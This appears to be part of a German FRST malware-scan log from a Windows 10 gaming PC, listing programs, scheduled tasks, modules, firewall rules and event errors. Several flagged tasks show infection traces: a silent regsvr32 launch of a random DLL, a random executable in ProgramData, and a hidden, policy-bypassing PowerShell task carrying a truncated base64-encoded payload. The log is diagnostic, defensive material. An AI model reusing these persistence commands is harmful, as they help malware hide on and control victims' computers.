Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version: - Relic Entertainment)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.21 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WISO steuer:Start 2016 (HKLM-x32\...\{B9654E81-E678-4A75-B477-1F83298CF149}) (Version: 23.00.1146 - Buhl Data Service GmbH)
WISO steuer:Start 2017 (HKLM-x32\...\{E3EAD09D-5F46-48BA-A3D3-7CC9822F5300}) (Version: 24.00.1375 - Buhl Data Service GmbH)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {0E3459D3-17FE-4CF3-9730-4DC3A34F39EC} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2017-02-02] (Bitdefender)
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe
Task: {362E13C9-3468-4E32-A32C-E7B73761F42A} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2014-09-28] (Samsung Electronics.)
Task: {4B617730-7F30-425D-896B-9D6B7E92F1EF} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2014-10-11] ()
Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8FA48323-C067-45BF-82AC-B16DB622D2CD} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2014-09-11] (ASUSTeK Computer Inc.)
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {996A2D51-2381-4CF1-B5CC-88C9013C7FF4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {99C86340-AB3F-46C9-9F72-4DE95AD5BB9B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-05-09] (Microsoft Corporation)
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A8EBBD79-429F-465A-9D7C-9D64A3AF7F70} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-04-24] (Bitdefender)
Task: {AF01F576-2A60-442D-A455-18C1D644581F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {C2B4A663-9C22-4E38-8EB4-5FD10B7D021F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CAD24F5C-D14E-4397-9E26-049636A6E220} - System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} => C:\ProgramData\{CA67D69C-7DCC-6137-7CD8-F928B38095A6}\8979DA1C-3ED2-6DB7-EB4A-721A167AE95D.exe <==== ACHTUNG
Task: {CB7B2173-4772-4267-9E22-FAED240AC907} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEABCBF8-4763-43D1-883B-86C80CB16A79} - System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwAgADsAOwA7ADsAIAA7ADsAOwA7ADsAOwA7ACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcA (Der Dateneintrag hat 9732 mehr Zeichen). <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2017-04-24 17:59 - 2017-04-24 17:59 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
2017-02-07 18:52 - 2017-02-07 18:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpbr.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpdsp.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 03243920 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpph.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 01544568 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttprbl.mdl
2017-05-07 17:13 - 2013-07-04 03:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2012-01-17 11:24 - 2012-01-17 11:24 - 00055296 _____ () C:\Windows\SysWOW64\ASGT.exe
2015-04-25 07:20 - 2014-10-11 16:57 - 01271096 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2010-07-15 06:44 - 2010-07-15 06:44 - 00020032 _____ () C:\Program Files\Unlocker\UnlockerCOM.dll
2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00947512 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ASUSMiniBar.exe
2017-05-09 21:31 - 2017-05-09 21:31 - 00074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-05-09 21:31 - 2017-05-09 21:31 - 00201728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 43195904 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 02457088 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\skypert.dll
2017-01-22 16:12 - 2013-10-29 14:43 - 00248832 _____ () C:\Program Files (x86)\Drakonia Configurator\hid.exe
2017-01-22 16:12 - 2012-12-11 12:14 - 00240640 _____ () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
2017-05-02 20:46 - 2017-05-02 20:46 - 00023840 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\de-de\bdsystray.txtui
2017-05-07 17:13 - 2017-05-21 20:55 - 00034448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll
2015-04-25 07:20 - 2014-10-11 16:52 - 04346368 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00827392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Version\Version.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00053248 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Exeio.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00278528 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Vender.dll
2015-04-25 07:19 - 2014-09-09 04:14 - 00662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00711680 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4DIGIPowerControlAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00856576 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4EpuAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00803840 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4FanAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00807936 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4TurboVEVOAction.dll
2015-02-09 16:47 - 2015-02-09 16:47 - 01932800 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Vender.dll
2015-03-09 23:12 - 2015-03-09 23:12 - 00057344 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Exeio.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00743424 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\EPU.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00908288 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\FAN.dll
2017-01-22 16:12 - 2013-01-15 18:06 - 00061952 _____ () C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll
2017-01-22 16:12 - 2011-11-22 15:18 - 00249856 _____ () C:\Program Files (x86)\Drakonia Configurator\language.dll
2015-04-25 07:27 - 2014-09-28 17:59 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll
2015-04-25 07:16 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2017-01-22 15:26 - 2017-01-04 15:28 - 01958912 _____ () C:\Users\Dino\AppData\Local\Discord\app-0.0.297\ffmpeg.dll
2017-01-22 15:26 - 2017-01-22 15:26 - 01082880 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_voice\discord_voice.node
2017-01-22 15:26 - 2017-01-22 15:26 - 03750400 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_voice\libdiscord.dll
2017-01-22 15:26 - 2017-01-22 15:26 - 00914432 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_utils\discord_utils.node
2017-01-22 15:26 - 2017-01-22 15:26 - 01127424 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_toaster\discord_toaster.node
2017-01-22 15:26 - 2017-01-04 15:28 - 02278912 _____ () C:\Users\Dino\AppData\Local\Discord\app-0.0.297\libglesv2.dll
2017-01-22 15:26 - 2017-01-04 15:28 - 00096768 _____ () C:\Users\Dino\AppData\Local\Discord\app-0.0.297\libegl.dll
2017-05-21 21:22 - 2017-05-21 21:22 - 00148992 _____ () \\?\C:\Users\Dino\AppData\Local\Temp\2F77.tmp.node
2017-01-22 15:26 - 2017-05-01 13:16 - 02658296 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_rpc\discord_rpc.node
2017-01-22 15:26 - 2017-05-01 13:16 - 02665976 _____ () \\?\C:\Users\Dino\AppData\Roaming\discord\0.0.297\modules\discord_contact_import\discord_contact_import.node
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
AlternateDataStreams: C:\Users\Dino\Desktop\tdsskiller.exe:BDU [0]
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2013-08-22 15:25 - 2017-05-21 20:57 - 00000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png
DNS Servers: 82.163.143.157 - 82.163.142.159
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{83AD83AC-5138-49A1-AFE6-642DD681957A}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{9F1EF34D-804D-4346-AA62-2A72FA0FBF6F}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{BDC0A943-FFD9-4C31-97CB-2F5C6223930F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{6208BE91-3EEB-4FD5-A9F6-AAF6B8B6DAD4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{BDBD0D1C-E183-400A-95C5-7EC28883BDC6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B0EFBE9B-6683-4F5E-B370-26BC5FBB1834}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B390EB1F-B557-4043-8E63-554A25E1FFA8}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Ghost Recon Wildlands Beta\GRW.exe
FirewallRules: [{4CE2A673-3091-4652-A0F4-EC8E65F46CDC}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's The Division PTS\TheDivision.exe
FirewallRules: [{A8417FA2-B44F-4117-8D45-30BCFD8686E6}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe
FirewallRules: [{100496F8-41F8-47A3-85DD-5D420F581AEB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe
FirewallRules: [UDP Query User{2E4F3652-EFD6-4881-9213-8EA61F89A46F}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe
FirewallRules: [TCP Query User{88C41D9B-BB60-4F64-BC68-6DAB1AF7FB31}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe
FirewallRules: [UDP Query User{47CE1527-A9E5-4FA6-8A51-6B1E508DD7AC}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe
FirewallRules: [TCP Query User{13A38046-9894-492B-9138-E3CF3B213870}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe
FirewallRules: [{99E199FA-1006-4A25-8A08-E28651356CDF}] => (Allow) D:\Programme\Ubisoft\Anno 2205\Bin\Win64\Anno2205.exe
FirewallRules: [{F3A38691-4442-4EAC-B3E6-B9767F22C203}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe
FirewallRules: [{A15E195A-CCA8-4C1D-84C5-546BF8AAE637}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe
FirewallRules: [TCP Query User{A6300EE9-EEE9-43B8-B529-D238E94D113B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{35161E84-F39F-429F-8D6F-A6CFC8EC13DF}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [{9CE73BB9-D886-4EA9-9EDD-54D04E01DB68}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{C60179E6-4096-438F-A0AE-D7E540CE18C9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A5BC860D-355B-4935-99F7-09C0A701AAAA}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{62A800D2-8909-45FC-BFD5-612EF096C6F1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{24A88AFE-6316-461C-984E-4AF8F05FCC96}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{FF456D46-8990-4A73-82F7-4A5484372E42}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{CCDDE9C4-05CA-48D1-90C8-2D615BC7B643}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe
FirewallRules: [{607A7BED-54D2-4F98-B9A6-4F5D91E07585}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe
FirewallRules: [{DBABDDB1-A8F5-4509-A5A6-1A9F0EF2F69D}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe
FirewallRules: [{66B9313C-1DF5-470C-B1BD-9064863CA77A}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe
FirewallRules: [{38C3B3D0-D3E0-4BB2-8D00-595270146FE7}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe
FirewallRules: [{71C075D1-31A5-4E48-B456-75C0CC247DA6}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe
FirewallRules: [{859B27CC-891C-45EC-8310-BCCAAC722A85}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe
FirewallRules: [{FC73742C-58EE-43B8-B2E2-0755BDB79FAB}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe
FirewallRules: [TCP Query User{D780C36A-DADD-4902-950C-1B44C2B4591C}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{6BF43327-BDB7-4AB4-898E-8A25BE985091}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{3F0F651B-1103-4AE2-9098-9BCC4F26404D}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe
FirewallRules: [{203174F0-92DD-4D57-B97E-47C4CAC797B9}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe
FirewallRules: [TCP Query User{DAB2A3D3-0749-4FBF-BA46-7878A1B608DF}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe
FirewallRules: [UDP Query User{2538DCE0-9E21-47AC-8348-A452790F29F9}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe
FirewallRules: [{51A9B374-5A57-46AB-A962-C889763A43AD}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe
FirewallRules: [{67DCCF13-0AEA-4A47-8084-823442F272BB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe
FirewallRules: [{300F8BBD-78E2-41E0-8EC4-16DF8E59E651}] => (Allow) D:\Programme\Ubisoft\Anno4.exe
FirewallRules: [{C5360BE6-1303-4A0E-8023-CC62F60B1E04}] => (Allow) D:\Programme\Ubisoft\Anno4.exe
FirewallRules: [{9274C44A-8563-4D10-AD7B-8DF46B5A8A84}] => (Allow) D:\Programme\Ubisoft\Addon.exe
FirewallRules: [{FC814241-9258-4F19-AF41-DB88E23957C1}] => (Allow) D:\Programme\Ubisoft\Addon.exe
FirewallRules: [{0B9C568A-9F54-4F5F-8A13-29E3E60DFD10}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe
FirewallRules: [{0A57F8DB-B618-48DA-A350-95E445171171}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe
FirewallRules: [{B609DA77-EEAE-4331-AF04-D6B0B12DD462}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe
FirewallRules: [{7F026620-DD5A-46CF-A2A1-E22FB29A9F0F}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe
FirewallRules: [{6207A230-EB6A-4610-B892-DF526C5DA9CB}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe
FirewallRules: [{6413A299-3AE2-4728-8D88-DBC7F4693304}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe
FirewallRules: [{8395ECDA-6B23-440A-961A-1338B31E9BCF}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe
FirewallRules: [{F954F9EC-FC53-42E6-8C62-5FAAB7F337F6}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe
FirewallRules: [{E6D4C42C-CFAE-433E-A5C8-75DD628070A2}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe
FirewallRules: [{DA17C889-BA52-4AEA-B1F7-56B213754083}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe
FirewallRules: [{B064A02F-82D3-46C7-BE5E-4847D6F8F3DD}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe
FirewallRules: [{46A60120-A927-4D76-888D-6D7D4D4928C8}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe
FirewallRules: [{614BDF81-34E7-4EF0-AF9D-124919FC7689}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe
FirewallRules: [{D83D6FE6-C127-45CA-9089-CB5A015F1059}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe
FirewallRules: [{8C525B9B-2F76-4D2A-88BF-33045C4BF9F4}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe
FirewallRules: [{8170164A-B9FD-4092-A573-9EEFE3E8D466}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe
FirewallRules: [TCP Query User{D3C7FE0D-703D-47B1-8FA2-AB9592BF1E7B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{6BF3876D-F5A1-4D45-B983-F240E0C30606}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [{3495CC5B-8440-473C-99FE-BB14A3B532D1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Wiederherstellungspunkte =========================
19-05-2017 15:50:08 Geplanter Prüfpunkt
21-05-2017 20:53:51 Revo Uninstaller's restore point - Spybot - Search & Destroy
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (05/21/2017 08:56:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x1ba0
Startzeit der fehlerhaften Anwendung: 0x01d2d263f2a109cb
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: ae299761-9933-4de1-aba7-7a3113a27840
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/21/2017 08:53:51 PM) (Source: VSS) (EventID: 8194) (User: )
